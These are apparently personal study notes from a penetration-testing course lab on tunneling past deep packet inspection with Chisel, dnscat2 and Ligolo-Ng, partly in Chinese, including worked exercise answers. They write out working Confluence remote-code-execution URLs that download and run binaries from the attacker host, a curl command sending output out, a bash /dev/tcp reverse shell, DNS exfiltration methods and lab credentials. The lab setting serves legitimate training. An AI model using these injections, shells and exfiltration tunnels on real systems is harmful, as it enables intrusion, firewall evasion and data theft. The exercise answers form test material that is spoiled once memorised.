19. Tunneling Through Deep Packet Inspection

[WDavid404]

• HTTP Tunneling Theory and Practice
• DNS Tunneling Theory and Practice

[WDavid404]

19.1. HTTP Tunneling Theory and Practice

HTTP Tunneling with Chisel

Chisel

Chisel： an HTTP tunneling tool that encapsulates our data stream within HTTP.

Chisel uses a client/server model. A Chisel server must be set up, which can accept a connection from the Chisel client.

The traffic between the Chisel client and server is all HTTP-formatted. The Chisel server on our Kali machine will listen on TCP port 1080, a SOCKS proxy port. All traffic sent to that port will be passed back up the HTTP tunnel to the Chisel client, where it will be forwarded wherever it's addressed.

Before we start the server, we should copy the Chisel client binary to CONFLUENCE01. The Chisel server and client are actually run from the same binary, they're just initialized with either server or client as the first argument.

on CONFLUENCE01 wget 192.168.118.4/chisel -O /tmp/chisel && chmod +x /tmp/chisel Next, we'll format this command to work with our curl Confluence injection payload. curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.118.4/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/ (翻译：curl http://192.168.50.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','wget 192.168.118.4/chisel -O /tmp/chisel && chmod +x /tmp/chisel').start()")}/)

On the Kali kali@kali:~$ chisel server --port 8080 --reverse run tcpdump on our Kali machine to log incoming traffic. kali@kali:~$ sudo tcpdump -nvvvXi tun0 tcp port 8080

Convert /tmp/chisel client 192.168.118.4:8080 R:socks > /dev/null 2>&1 & to kali@kali:~$ curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%27%29.start%28%29%22%29%7D/ 翻译： curl http://192.168.50.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','/tmp/chisel client 192.168.118.4:8080 R:socks').start()")}/

However, nothing happens. We don't see any traffic hit our Tcpdump session, and the Chisel server output doesn't show any activity.

To read the command output, we can construct a command which redirects stdout and stderr output to a file, and then send the contents of that file over HTTP back to our Kali machine. We use the &> operator, which directs all streams to stdout, and write it to /tmp/output. /tmp/chisel client 192.168.118.4:8080 R:socks &> /tmp/output; curl --data @/tmp/output http://192.168.118.4:8080/

kali@kali:~$ curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%20%26%3E%20/tmp/output%20%3B%20curl%20--data%20@/tmp/output%20http://192.168.118.4:8080/%27%29.start%28%29%22%29%7D/ On sending this new injection, we check Tcpdump output for attempted connections.

Chisel is trying to use versions 2.32 and 2.34 of glibc, which the CONFLUENCE01 server does not have.

kali@kali:~$ chisel -h
  Usage: chisel [command] [--help]
  Version: 1.8.1-0kali2 (go1.20.7)

On the Chisel Github page, we find an "official" compiled binary, also version 1.81, is compiled with Go version 1.19. Donwload it and redo the steps above...

After the connection btw chisel server and client set up, login to SSH server on DB server In Port Redirection and SSH Tunneling, we created SOCKS proxy ports with both SSH remote and classic dynamic port forwarding, and used Proxychains to push non-SOCKS-native tools through the tunnel. But we've not yet actually run SSH itself through a SOCKS proxy.

SSH doesn't offer a generic SOCKS proxy command-line option. Instead, it offers the ProxyCommand configuration option. We can either write this into a configuration file, or pass it as part of the command line with -o.

ProxyCommand accepts a shell command that is used to open a proxy-enabled channel. The documentation suggests using the OpenBSD version of Netcat, which exposes the -X flag and can connect to a SOCKS or HTTP proxy. However, the version of Netcat that ships with Kali doesn't support proxying.

Instead, we'll use Ncat, the Netcat alternative written by the maintainers of Nmap. We can install this on Kali with sudo apt install ncat.

kali@kali:~$ sudo apt install ncat

kali@kali:~$ ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215
# pass an Ncat command to ProxyCommand. The command we construct tells Ncat to use the socks5 protocol and the proxy socket at 127.0.0.1:1080. The %h and %p tokens represent the SSH command host and port values, which SSH will fill in before running the command.

[WDavid404]

19.2. DNS Tunneling Theory and Practice

DNS Tunneling Fundamentals

Dnsmasq is DNS server software that requires minimal configuration. A few Dnsmasq configuration files are stored in the ~/dns_tunneling folder.

kali@felineauthority:~/dns_tunneling$ sudo dnsmasq -C dnsmasq.conf -d

we can transfer small amounts of information (exfiltrated data) from inside the network to the outside, without a direct connection, just by making DNS queries. How to send a binary file by exfiltration? A: We could convert a binary file into a long hex string representation, split this string into a series of smaller chunks, then send each chunk in a DNS request for [hex-string-chunk].feline.corp. On the server side, we could log all the DNS requests and convert them from a series of hex strings back to a full binary.

The TXT record is designed to be general-purpose, and contains "arbitrary string information". We can serve TXT records from FELINEAUTHORITY using Dnsmasq. First, we'll kill our previous dnsmasq process with a C+c. Then we'll check the contents of dnsmasq_txt.conf and run dnsmasq again with this new configuration.

kali@felineauthority:~/dns_tunneling$ cat dnsmasq_txt.conf kali@felineauthority:~/dns_tunneling$ sudo dnsmasq -C dnsmasq_txt.conf -d

on PGDATABASE01

If we wanted to infiltrate binary data, we could serve it as a series of Base64 or ASCII hex encoded TXT records, and convert that back into binary on the internal server.

[WDavid404]

DNS Tunneling with dnscat2

dnscat2 to exfiltrate data with DNS subdomain queries and infiltrate data with TXT (and other) records. dnscat2 uses a client server architecture to tunnel traffic via UDP and/or DNS queries. It can be used to bypass firewalls and execute commands on the machine running the client.

A dnscat2 server runs on an authoritative name server for a particular domain, and clients (which are configured to make queries to that domain) are run on compromised machines.

We'll inspect traffic from FELINEAUTHORITY with tcpdump, filtering specifically on UDP port 53 (udp port 53). kali@felineauthority:~$ sudo tcpdump -i ens192 udp port 53

Run dnscat2-server, passing the feline.corp domain as the only argument. kali@felineauthority:~$ dnscat2-server feline.corp --> dnscat2 server is listening on all interfaces on UDP/53.

run the dnscat2 client binary from the dnscat folder in the database_admin home directory, with the feline.corp domain passed as the only argument.

database_admin@pgdatabase01:~$ cd dnscat/
database_admin@pgdatabase01:~/dnscat$ ./dnscat feline.corp
Creating DNS driver:
 domain = feline.corp
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 127.0.0.53

Encrypted session established! For added security, please verify the server also displays this string:

Annoy Mona Spiced Outran Stump Visas 

Session established!

The dnscat2 client reports that a session has been established. We can check for connections back on our dnscat2 server. kali@felineauthority:~$ dnscat2-server feline.corp

This indicates that the dnscat2 server is listening on all interfaces on UDP/53.

start interacting with our session from the dnscat2 server. Let's list all the active windows with the windows command, then run window -i from our new "command" shell to list the available commands.

Then, Setting up a port forward from FELINEAUTHORITY to PGDATABASE01.

command (pgdatabase01) 1> listen 127.0.0.1:4455 172.16.2.11:445
Listening on 127.0.0.1:4455, sending connections to 172.16.2.11:445
command (pgdatabase01) 1> 

From another shell on FELINEAUTHORITY kali@felineauthority:~$ smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234

In this Learning Unit we used dnscat2 to tunnel SMB traffic through DNS requests and responses. We used that to list the available shares on a host deep inside the internal network, despite the fact that neither HRSHARES or PGDATABASE01 had direct connectivity to our FELINEAUTHORITY server.

[WDavid404]

Questions

19.1.2 Q2

10.4.236.215  - PGDATABASE01 
192.168.236.63 - CONFLUENCE01 
192.168.45.224 - Kali

1. On Kali，prepare a Chisel tool https://github.com/jpillora/chisel/releases/tag/v1.9.1 下载对应Kali OS （Linux）：chisel_1.9.1_linux_amd64.gz （extract it to get ‘chisel’ file） --》即使Kali VM所在的PC CPU是intel, 也能在kali上运行正常

2. python3 -m http.server 80

3. On Kali, chmod a+x ./chisel; ./chisel server --port 8080 -reverse

4. On Kali, upload chisel file to CONFLUENCE01 curl http://192.168.236.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.224/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/ （encode前的原文： curl http://192.168.236.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','wget 192.168.45.224/chisel -O /tmp/chisel && chmod +x /tmp/chisel').start()")}/）

--> if success, you can see the log of http.server as below

5. On Kali, make CONFLUENCE01 run chisel on client mode curl http://192.168.236.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.45.224:8080%20R:socks%27%29.start%28%29%22%29%7D/ （encode前的原文： curl http://192.168.236.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','/tmp/chisel client 192.168.45.224:8080 R:socks').start()")}/ ) ---->

6. ss -ntplu

   ...
   tcp             LISTEN           0                4096                           127.0.0.1:1080                           0.0.0.0:*              users:(("chisel",pid=293927,fd=8))                                                                    
   tcp             LISTEN           0                4096                                   *:8080                                 *:*              users:(("chisel",pid=293927,fd=6))  
   ...

7. since ‘session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening’, config '/etc/proxychains4.conf' to use 1080 port

8. Download chisel_exercise_client file and chmod it

9. proxychains ./chisel_exercise_client -i 10.4.236.215 -p 8008

[WDavid404]

19.2.2 Q2

10.4.236.215 - PGDATABASE01
database_admin / sqlpass123

192.168.236.7 - FELINEAUTHORITY
kali / 7he_C4t_c0ntro11er

192.168.236.64 - MULTISERVER03
192.168.236.63 - CONFLUENCE01
172.16.236.217 - HRSHARES 

192.168.45.224 - Kali

1. SSH login to FELINEAUTHORITY: ssh kali@192.168.236.7
2. kali@felineauthority:~/dns_tunneling$ cat dnsmasq_txt.conf

3.kali@felineauthority:~$ dnscat2-server feline.corp

4. On Kali, login to CONFLUENCE01 by the following command curl http://192.168.236.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.224/4444%200%3E%261%27%29.start%28%29%22%29%7D/

5. On CONFLUNCE01， python3 -c 'import pty; pty.spawn("/bin/bash")'

6. SSH Login to PGDATABASE01 On CONFLUNCE01 ssh database_admin@10.4.236.215

7. Confirm that there is dnscat tool on PGDATABASE01

8. database_admin@pgdatabase01:~$ cd dnscat/
   database_admin@pgdatabase01:~/dnscat$ ./dnscat feline.corp

   on client side (PGDATABASE01): confirm the dns tunnel is established.

on server side (FELINEAUTHORITY): confirm the dns tunnel is established.

9. on server side (FELINEAUTHORITY):

   dnscat2> windows
   0 :: main [active]
   crypto-debug :: Debug window for crypto stuff [*]
   dns1 :: DNS Driver running on 0.0.0.0:53 domains = feline.corp [*]
   1 :: command (pgdatabase01) [encrypted, NOT verified] [*]

   
   dnscat2> window -i 1
   New window created: 1
   history_size (session) => 1000
   Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
   For added security, please ensure the client displays the same string:

Seitan Mcgill Killer Maps Deepen Spiced This is a command session!

That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'.

command (pgdatabase01) 1> ?

Here is a list of commands (use -h on any of them for additional help):

• clear
• delay
• download
• echo
• exec
• help
• listen
• ping
• quit
• set
• shell
• shutdown
• suspend
• tunnels
• unset
• upload
• window
• windows

10. Setting up a port forward from FELINEAUTHORITY --> PGDATABASE01-->HRSHARES using dns tunnel .
`command (pgdatabase01) 1> listen 0.0.0.0:4646 172.16.236.217:4646`
where 172.16.236.217 is IP of HRSHARES.

11. On Kali，download dnscat_exercise_client  and do 'chmod a+x' for dnscat_exercise_client
12. using port forward built by dns tunnel on FELINEAUTHORITY 
` ./dnscat_exercise_client -i 192.168.236.7 -p 4646`  where 192.168.236.7 is IP of FELINEAUTHORITY.

[WDavid404]

Ligolo-Ng

https://github.com/nicocha30/ligolo-ng

• Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections with each target.
• Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.
• Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket.

Donwload:

### Setting up Ligolo-Ng Step1. ``` ip tuntap add user root mode tun ligolo ip link set ligolo up ``` Step2: Unzip the Ligolo proxy file: `tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz` Step3: The chosen approach involves utilizing the ‘-selfcert’ option, which operates on **port 11601**. ./proxy -selfcert （ 我的PC上需要执行 **sudo** ./proxy -selfcert ，否则在后面step里建立tun时会因为permission不足而失败） Step4: To facilitate the transmission of this agent file to the target, establish a server with the command: updog -p 80 Step5: On the target machine, ``` powershell wget 192.168.1.5/agent.exe -o agent.exe ./agent.exe -connect 192.168.1.5:11601 -ignore-cert ``` Step6 ``` ip route add 192.168.148.0/24 dev ligolo ip route list ``` 【PS】In my case, I use `sudo ip route add 10.10.186.0/24 dev ligolo` Step7 Return to the Ligolo proxy session window and initiate the tunneling process by entering the ‘start’ command, as demonstrated in the provided image. Final： Upon attempting to ping the IP now, successful ping responses will be observed Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below. More details: https://www.hackingarticles.in/a-detailed-guide-on-ligolo-ng/ ### Next case: [box2(10.10.197.154) --> box1(10.10.197.153/192.168.237.153) --> Kali(192.168.45.205)] [kali (proxy)] listener_add --addr 0.0.0.0:1236 --to 0.0.0.0:80 (用于文件传输) listener_add --addr 0.0.0.0:11601 --to 0.0.0.0:11601 （用于建立ligolo tunnel）  [box2] wget 10.10.197.153:1236/ligolo-ng/agent.exe -o agent.exe agent.exe -connect 10.10.197.153:11601 -ignore-cert ### New case: how to access Agent's port from proxy Use: 240.0.0.1 IP ``` sudo ip route add 240.0.0.1/32 dev ligolo curl -v 240.0.0.1:800 ```